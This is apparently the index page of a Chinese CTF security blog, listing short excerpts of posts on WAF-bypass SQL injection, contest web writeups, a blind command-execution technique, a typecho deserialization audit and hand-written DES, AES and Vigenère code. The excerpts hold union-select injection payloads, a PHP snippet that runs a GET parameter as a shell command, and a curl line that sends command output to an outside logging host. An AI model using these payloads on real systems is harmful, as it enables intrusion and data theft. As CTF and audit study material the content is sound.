sky's blog

sky's blog

一叶飘零 @ whitzard / r3kapig

有点意思的3道web题
前言昨晚看完了前任3,虐的有点厉害……写篇博客压压惊(哎……所有的分手总有一个人先放弃,两情相悦总归也有付出更多的那一方,选择一个更爱你的人,还是你更爱的人是一个值得思考的问题) 绕过云waf题目简述题目来自最近的xctf赛博地球杯工业互联网安全大赛,是一道比较有趣的云waf绕过题目,题目过滤比较多,留下能用的只有like,regexp等为数不多的函数,这里我将介绍两种方法: 题目解法一这是属于比较常规的思路,即fuzz一下过滤参数,然后找到未被过滤的参数,进行拼接绕过waf,这里题目限制严格,而手动测试容易得知:121. or的过滤可以用||绕过2. 空格的过滤可用%0a绕过 而后我们...
2018 安恒一月月赛部分题解
来个友情链接容易得到文件泄露:.git拿到源码后发现了用户名和密码123define('USERNAME', 'ambulong');define('PASSWORD', 'd5cae3acc4070jc359f4012f3ddc5f53');define('SALT', '.KIJ03,;owas'); 但是并不知道登录界面在哪里,猜想源码泄露可能没有给全……翻了git的记录也没发现什么,还是等大佬的官方题解吧 SecNote在源码中得到提示www.zip成功下到源码...
2018 XCTF-赛博地球杯工业互联网安全大赛web部分题解
工控云管理系统项目管理页面解析漏洞题目首先给出了源码:http://47.104.156.32:20007/view-source.php关键代码如下:第一层绕过:12345678910111213141516171819<?php if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'config.php'; $id = mysql_real_escape_string...
hackme网站边做边记录
WEBhide and seek查看源代码即可 guestbook简单注入https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,database(),4 -- 1可以得到数据库名guestbook1https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='guestbook' limit ...
Time_Based_RCE
前言想必大家遇到RCE的题目不算少数,那么如果题目可以命令执行,却没有回显,那么我们应该如何有效打击呢? 盲打RCE先看这样一段函数:123<?php$cmd = $_GET[`cmd`];echo `$cmd`; 对于这样的情况,我们可以直接?cmd=ls即可拿到回显:1docker-compose.yml flag index.php 但是如果题目变成123<?php$cmd = $_GET[`cmd`];`$cmd`; 又该怎么办呢?这里的命令执行结果显然不会打印出来,那么我们如何获取到这个结果?这里介绍一种方法:1curl http://ip.port.b182oj....
cms小白审计-typecho反序列漏洞
前记通过最近的比赛,决定沉淀下来,从复现cms开始慢慢锻炼自己的审计能力,毕竟这个年头的CTF,不会审计只能活在边缘了…… typecho漏洞审计问题存在于在根目录install.php文件的229-235行1234567<?php$config = unserialize(base64_decode(Typecho_Cookie::get('__typecho_config')));Typecho_Cookie::delete('__typecho_config');$db = new Typecho_Db($config['adapter'], $config['prefix'...
一道有关密钥编排的DES题目
题目代码12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313...
密码学课程设计之二手撸AES加解密程序
前记本来以为和DES一样挺好写的,但是写的时候发现,差的挺多的…… 一些基本功能函数16进制异或123456789101112131415def xor(str1_hex,str2_hex): hex_to_bin = {"0":"0000","1":"0001","2":"0010","3":"0011","4":"0100","5":"0101","6":"0110","7":"0111","8":"1000","9":"1001","A":"1010","B":"1011","C":"1100","D":"1101","E":"1110","F":"1111"...
密码学课程设计二之手撸DES加解密程序
前记因为手撸的目的是了解DES加解密全过程,所以并没有追求效率,当时写的时候也很快就写完了,后面如果有时间会改进效率,毕竟测试了一下……加密7000单词的作文需要2秒……实在是太差了,毕竟菜鸡= = 简单说一下原理密钥编排1.首先输入64bit密钥2.将64bit密钥经过PC-1盒变成56bit3.将56bit分为C0和D0,分别28bit4.将C0,D0分别循环移位,得到C1,D15.将C1,D1拼接,经过PC-2盒变成48bit子密钥key16.重复步骤47.生成16组子密钥这里真实加密只用到56bit,后面会有文章借助一道DES题目细致讲解这个密钥编排 F函数1.将输入的32bit...
密码学课程设计一之维吉尼亚唯密文破解
前记今天终终终终终终终终终终于考完试了,结束了1周考3门,3周考5门的窘况,于是开始补Blog,写一下这3周来弄的东西 维吉尼亚唯密文爆破这里利用了重合指数法和互重合指数法:重合指数法:猜测密钥长度互重合指数法:猜测相对位移长度 重合指数法12345678910def chzs(input): #重合指数法 num_list = [0]*26 for i in range(0,len(input)): ord_input = ord(input[i])-97 num_list[ord_input] +=1 n = len(input) ...
avatar
一叶飘零
苟有恒,何必三更眠五更起。